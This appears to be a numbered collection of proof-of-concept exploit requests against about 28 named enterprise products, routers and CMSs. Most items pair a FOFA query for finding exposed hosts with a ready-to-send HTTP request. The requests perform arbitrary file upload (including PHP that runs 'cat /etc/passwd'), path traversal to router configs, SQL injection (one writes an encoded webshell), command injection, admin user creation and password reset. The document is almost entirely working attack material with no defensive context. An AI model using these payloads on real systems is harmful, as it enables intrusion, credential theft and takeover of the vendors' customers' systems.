FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 (SunFull) X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 (Jiahui video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技临床浏览系统 (Lanwon clinical viewing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通电子文档安全管理系统 (ESAFENET electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下外贸ERP (Futong Tianxia foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}


193. 山石网科云鉴安全管理系统 (Hillstone Yunjian security management system) setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星上网行为管理系统 (Volans internet access management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技统一认证平台 (Henan Fengsu Technology unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特客户资源管理系统 (Zheda Ente customer resource management system) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. cockpit assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF value, obtain a cookie with it, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 (Founder omnimedia news editing system) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR (Redsea eHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
